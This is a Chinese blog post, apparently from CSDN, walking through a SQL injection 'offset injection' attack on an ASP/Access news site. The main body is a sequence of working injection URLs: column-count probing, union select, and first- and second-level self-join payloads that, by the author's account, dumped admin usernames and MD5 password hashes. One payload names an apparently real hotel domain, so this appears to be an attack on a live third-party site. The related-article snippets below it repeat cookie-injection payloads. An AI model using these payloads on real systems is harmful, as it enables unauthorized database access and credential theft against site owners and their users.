【实战渗透】对 ACCESS 偏移注入实战(针对爆不出字段名)

最新推荐文章于 2022-05-02 13:32:38 发布
最新推荐文章于 2022-05-02 13:32:38 发布
阅读量466 收藏 4
点赞数
分类专栏: WEB安全 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/V1040375575/article/details/108466616
版权
ACCESS 偏移注入记录
  
Access偏移注入原理,基本公式为:
order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案;
也就是:
order by = 22 
* = 6个字符
2 × * = 12个字符
22 - 12 = 10个字符

 

 
注入点:
 
查询字段数:
www.xxx.com/Newsview.asp?id=832 order by 16 回显正常
www.xxx.com/Newsview.asp?id=832 order by 17 回显错误
 
 
 
联合查询:
www.xxx.com/Newsview.asp?id=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
 
获得回显点:
 
不过不知道字段名,工具只能爆破出两个分别为:admin_name,admin_id,我们借助access的偏移注入获取更多信息。
 
得到admin的字段数(通过用“*”号替换数字,不断向前进位,查看回显页面是否正常):
 
 
 
这里可以知道admin的字段数为:16-11 = 5  ,所以 admin里面有5个字段。
 
接下来进行主题,偏移注入:
 
偏移注入的基本公式为:order by 出的字段数-*号的字段数x2。这里是16-5*2=6,那么开始构造payload:
 
http://www.ronghuhotel.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_id=b.admin_id)
 
 
可以看到直接爆出 用户和md5加密密码。
 
 
我们可以尝试改变语句获得更多信息,因为偏移注入获得的内容是随机的, 打乱信息组合。
 
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,a.admin_name,b.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name) 
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,a.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name) 
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,b.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name) 
...
还有很多,还可以把admin_name改为admin_id。
 
这些都是一级偏移:
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
 
二级偏移:
union select 1,a.id,b.id,c.id, * from ((admin as a inner join admin as bon a.admin_name =b.admin_name) inner join admin as c on a.admin_name =c.admin_name)
 
PS:偏移注入只适用于access数据库。
pandarking
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从数据库说偏移注入原理
Do的博客
11-16 505
从数据库说偏移注入原理 场景 在常见的SQL注入当中,一般是将数据库中的表名、列名猜解出来之后,然后通过查询的方式获取具体的数据值。如SqlMap就是采用这样的注入流程进行数据获取的。但是这样的方式存在一个问题就是当知道数据表的名字,但是列名很长,或者数据库系统比较简单,不能通过查询系统数据库中的信息获取到用户表中的表名时就很难获取到想要的数据信息,如access数据库。(比如其中SQL Server 和MySQL都可以通过查询系统数据库获取到具体的列名) 原理 简单来说偏移注入的原理就是通过连接查询方式
Access注入偏移注入
Mr.Huang_的博客
09-04 259
一、偏移注入使用场景 二、偏移注入步骤 三、偏移注入靶场讲解 前面的内容是上一篇的access——cookie的内容,这里我就不多赘述。 下面演示使用得是: F12点击Console使用js方法,当然还有其他方法例如插件,抓包等 直接开始 这里我就不多赘述,判断回显位。 document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin") escape()函数,里面的数据会自动进行url
SQL手工注入漏洞测试(Access数据库)
Fisher
12-13 1193
1.判断数据库 首先拿到手依然是找注入点,此题注入点id=1,已经找到接着进行判断数据库类型,当然我们已经找到这个数据库为access,但是我们仍然需要判断一下。具体参照https://blog.csdn.net/happyorange2014/article/details/49754951这个博客写的异常好,介绍了怎么判断access数据库。 试了一下最好用的还是用len()和chr()函数进行判断 chr(65)='A’,发现界面正确,说明可以用chr()函数 接下可以看出来len(‘a’)=1.l
15、Access数据库偏移注入
Fly_鹏程万里
03-01 2007
前言       本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额。。。还是算了吧,没有太多的时间,之后在网上搜索了一些“偏移注入”看看其他人是否有写这个方面的资料,但是非常少,不过还是找到了几个,下面笔者就借用其他技术大佬的一些图片来介绍Access数据库的偏移注入,期间使用的图片不是笔者本人自己截图的,但是所有的思路以及渗透...
Access数据库注入偏移注入
seek_2022的博客
05-02 2402
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
Access偏移注入利用-01
最新发布
09-15
Access偏移注入利用-01
Access实战经典.docx
11-16
Access实战经典.docx
Access偏移注入
10-02
Access偏移注入教程 该文章出自『草哲's BLOG』,原文链接:http://www.337479.cn/alias/access-migration-into-the/
access偏移-sql.rar
02-19
cracer教程培训,access数据库偏移注入网站源码,直接使用IIS搭建网站,放在wwwroot路径下即可
asp+access注入源码.zip_asp+access注入_asp+access源代码_asp注入源码_渗透_渗透代码
09-24
渗透测试,asp+access注入源代码实现,直接导入可以使用
SQL注入偏移注入Access
秋水的博客
09-02 4968
注入简介 什么是偏移注入偏移注入是一种注入姿势,可以根据一个较多字段的表对一个少字段的表进行偏移注入,一般是联合查询,在页面有回显点的情况下 偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。 像Sqlmap之类的工具实际上是爆破...
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
渗透测试----access偏移注入
08-01 253
 偏移注入access偏移注入,由于数据库结构的问题,偏移注入只适用于access数据库。对于access数据库来说,无论是逐字猜解还是联合查询注入,都是需要我们能够猜到用户名和密码的列名(字段),才可以注入出数据,而有的时候,站长取的字段名很另类,我们猜不出来的时候,就需要偏移注入了。  偏移注入的前提:   猜出表名,且知道一个或多个字段。(access)  如果当前注入点的...
SQL注入(偏移注入)---zkaq
weixin_38237216的博客
04-11 710
1.概念 偏移注入:是一种注入姿势,可以根据一个较多字段的表对一个少字段的表进行偏移注入,一般是联合查询,在页面有回显点的情况下 使用场景: 知道表名,不知道字段名 注入点的字段数要大于需要查询的表名字段数 2.靶场 1.判断是否存在注入 使用payload:document.cookie="id = " + escape("105 and 1=1 ") 2.判断字段数 payload:document.cookie="id = " + escape("105 order by 26 ") 3.
SQL注入Access注入Access偏移注入
一个普普通通的博客
02-12 814
Access注入Access偏移注入
Access偏移注入与原理
子曰小玖的博客
02-22 1818
Access偏移注入:表名知道,列名无法获取的情况下。 1、判断注入点 127.0.0.1/asp/index.asp?id=1513 and 1=1 正常 127.0.0.1/asp/index.asp?id=1513 and 1=2 错误 2、查询字段个数 127.0.0.1/asp/index.asp?id=1513 order by 22 正常 127.0.0.1/...
access偏移注入
baynk的博客
06-07 2873
记录总结偏移注入的使用方法。 为什么要用偏移注入 偏移注入access比较独有的一种注入手段,很有特点(人品。。)的注入方式,一般用于在猜出了表名但是没有猜出列名的情况下使用。 偏移注入的使用 目前猜测出了表名,但是怎么都猜不出列名,使用联合查询法来进行偏移注入。 接下来测出偏移量,其实这个偏移量就是admin这张表的列的个数。直接将22改成*号,测试是否回显正常,不正常就一直往前减,一...
移位溢注:告别依靠人品的偏移注入
Fly_鹏程万里
07-26 347
介绍: 在Access数据库类型注入的时候,我们获取不到列名(前提是有表名),一般会选择使用偏移注入,但是这种注入方式往往借助的是个人的人品,且步骤繁琐。本文中我们研究了一种新的注入技术让“偏移注入不在需要人品”。在这里定义这种注入技术为:“移位溢注技术”。 它适用于ACCESS和MYSQL(任何版本) 正文: 我们先来看看普通的偏移注入步骤: 1.判断注入点 2.order by 判断...
SQL注入-针对asp+access网站进行SQL注入
qq_25899635的博客
05-23 4942
asp+access网站技术介绍   ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASp文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标志语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也...
access实战pdf
07-01
access实战PDF是指通过微软Access数据库软件来实现对PDF文件的操作和管理。在实际应用中,可以利用Access的功能,包括表格、查询、表单和报表,来创建和管理PDF文件。 首先,通过Access的表格功能,可以创建一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值